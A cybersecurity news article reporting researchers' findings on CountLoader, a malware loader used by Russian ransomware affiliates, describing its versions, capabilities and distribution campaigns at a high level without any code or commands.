A new malware loader named CountLoader has been discovered by cybersecurity researchers. This loader is being used by Russian ransomware groups to deliver post-exploitation tools such as Cobalt Strike, AdaptixC2, and the PureHVNC RAT remote access trojan.
According to an analysis by Silent Push, CountLoader is being utilized by ransomware affiliates associated with the LockBit, Black Basta, and Qilin ransomware groups. The malware comes in three versions – .NET, PowerShell, and JavaScript – and is currently being used in a campaign targeting individuals in Ukraine through PDF-based phishing lures.
The PowerShell version of CountLoader was previously detected by Kaspersky being distributed using DeepSeek-related decoys to deceive users into installing it.
The attacks involving CountLoader have led to the deployment of an implant called BrowserVenom, which manipulates network traffic and collects data by forcing browsing instances through a proxy controlled by the threat actors.
Further investigation by Silent Push revealed that the JavaScript version of CountLoader is the most sophisticated, offering multiple methods for file downloading and executing malware binaries, as well as identifying a victim’s device based on Windows domain information.
CountLoader is capable of gathering system information, setting up persistence on the host by creating a scheduled task, connecting to a remote server for instructions, and downloading and running DLL and MSI installer payloads.
CountLoader’s developers have demonstrated advanced knowledge of the Windows operating system and malware development by using LOLBins like ‘certutil’ and ‘bitsadmin’ and implementing an encryption PowerShell generator for commands.
An interesting feature of CountLoader is its use of the victim’s Music folder as a staging area for malware. The malware infrastructure consists of over 20 unique domains, facilitating the distribution of Cobalt Strike, AdaptixC2, and PureHVNC RAT.
Recent campaigns distributing PureHVNC RAT have utilized the ClickFix social engineering tactic, with victims being lured through fake job offers to a phishing page where the trojan is deployed through a Rust-based loader.
The interconnected nature of the Russian ransomware landscape has been uncovered by the DomainTools Investigations team, revealing threat actor movements across groups and the use of tools like AnyDesk and Quick Assist.
DomainTools noted that brand allegiance is weak among these operators, with human capital being the primary asset. Trust relationships play a critical role, and individuals choose to work with people they know, regardless of the organization’s name.
